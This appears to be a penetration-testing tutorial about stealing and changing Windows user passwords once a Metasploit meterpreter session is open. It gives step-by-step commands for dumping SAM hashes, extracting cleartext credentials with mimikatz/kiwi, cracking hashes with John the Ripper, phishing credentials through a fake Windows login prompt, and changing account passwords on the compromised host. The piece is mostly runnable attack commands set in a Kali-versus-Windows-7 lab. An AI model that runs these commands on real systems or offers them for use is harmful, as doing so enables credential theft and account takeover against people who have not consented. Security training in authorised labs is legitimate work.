In this article, we will teach you how to extract Windows users’ passwords and how to change the extracted passwords by using the Metasploit framework.
Here you need to exploit the target machine once to obtain meterpreter session and then bypass UAC for admin privilege.
You will need a Kali Linux Attacker and a windows 7 target.
Extracting User Account (Windows) Passwords
Method 1
After you get the meterpreter session of the target system, follow the given steps as shown below:
Execute the commands given below. This will dump the Hash value of all saved passwords of all the windows users as shown in the image.
meterpreter> hashdump
Then copy all hash value in a text file as shown and save it. Here it’s saved as hash.txt on the desktop. It contains a hash value of 4 users with SID value as 500: Administrator; 501: Guest; 1001: Pentest; 1000: Raj with their hash password.
Now run your capture session in the background:
meterpreter > background
Now open a new terminal and use john the ripper to crack the hash by executing this command:
/root/Desktop/pass.txt contain the path of your password dictionary /root/Desktop/hashes.txt contain the path of the hash password value
From the image shown below you can confirm that we had successfully retrieved the password: 123 for user: raj by cracking its hash value.
john –wordlist=/root/Desktop/pass.txt –format=NT /root/Desktop/hashes.txt
Method 2
This module uses the registry to dump the local user accounts from the SAM database.
In the image notice that we obtained a hash value for a local user account, repeat above step to crack this value using john the ripper.
If you notice the highlighted text then you will see that it has to capture password hint for user RAJ: “first three digits”
msf > use post/windows/gather/hashdump msf post(hashdump) > set session 2 msf post(hashdump) > exploit 1 2 3 msf > use post/windows/gather/hashdump msf post(hashdump) > set session 2 msf post(hashdump) > exploit
Method 3
This method dumps all local accounts from the SAM Database. If the target host is a Domain Controller, it dumps the Domain Account Database using the proper techniques depending on privilege levels, OS and the role of the host.
From the image given below, you can observe that we obtained a hash value for RAJ and Administrator account, repeat the above step to crack this value using john the ripper. Furthermore, it has to capture the same password hint for User Raj.
msf > use post/windows/gather/smart_hashdump msf post(smart_hashdump) > set session 2 msf post(smart_hashdump) > exploit 1 2 3 msf > use post/windows/gather/smart_hashdump msf post(smart_hashdump) > set session 2 msf post(smart_hashdump) > exploit
Method 4
This technique harvests credentials found on the host and stores them in the database.
This exploit also works in the same way and dumps the hash value for the local user account (as shown), repeat above step to crack these value using john the ripper.
1 2 3 msf > use post/windows/gather/credentials/credential_collector msf post(credential_collector) > set session 2 msf post(credential_collector) > exploit
Method 5
This module collects clear text Single Sign-On credentials from the Local Security Authority. It does so by using the Mimikatz extension. Although it will not store Blank passwords in the database.
This exploit will dump clear text password of login user as shown in given below image user: raj and password: 123
msf > use post/windows/gather/credentials/sso msf post(sso) > set session 2 msf post(sso) > exploit
Method 6
At the meterpreter session, we can enable option “kiwi” which will load mimikatz extensions
meterprerter > load kiwi
Now run the following command which extracts all saved credential of the local user account as shown below. Here we have also had successfully retrieved password: 123 of user: raj
meterpreter > creds_all
Method 7
This module is able to perform a phishing attack on the target by popping up a login prompt. When the user fills credentials in the login prompt, the credentials will be sent to the attacker. The module can monitor for new processes and pop up a login prompt when a specific process is starting.
msf > use post/windows/gather/phish_windows_credentials msf post(phish_windows_credentials) > set session 2 msf post(phish_windows_credentials) > exploit 1 2 3 msf > use post/windows/gather/phish_windows_credentials msf post(phish_windows_credentials) > set session 2 msf post(phish_windows_credentials) > exploit
As defined above it launches fake login prompts that appear genuine to the victim on his logon screen and waits for the users’ credentials.
At logon screen the user will get a fake pop for his credential as he will enter his username and password for login into his system, the attacker will gain the entered credential.
Below you can observe the sniff credential for user raj. it’s saved username, domain, and password in a table.
Change password of Remote system
Method 1
This module will change the password of the targeted account. The typical usage is to change a newly created account’s password on a remote host to avoid the error, ‘System error 1907 has occurred,’ which is caused when the account policy enforces a password change before the next login.
After knowing logging user “raj” password you can easily change the password by exploiting the command above. From the given below image, you can observe that we had changed the password from 123 into 987.
1 2 3 4 5 6 msf > use post/windows/manage/change_password msf post(change_password) > set smbuser raj msf post(change_password) > set old_password 123 msf post(change_password) > set new_password 987 msf post(change_password) > set session 1 msf post(change_password) > exploit
Method 2
As we known meterpreter itself is a set of multiple options for post exploits. It allows attackers to open command prompt of victims’ systems without their permission by executing shell command as given below.
Hence in the first method, we changed the password from 123 into 987 and now again in the second method we changed the password from 987 to 123 using simple CMD net user command as shown in the command below.
Secure Your Organization’s Mind with Securemind.se
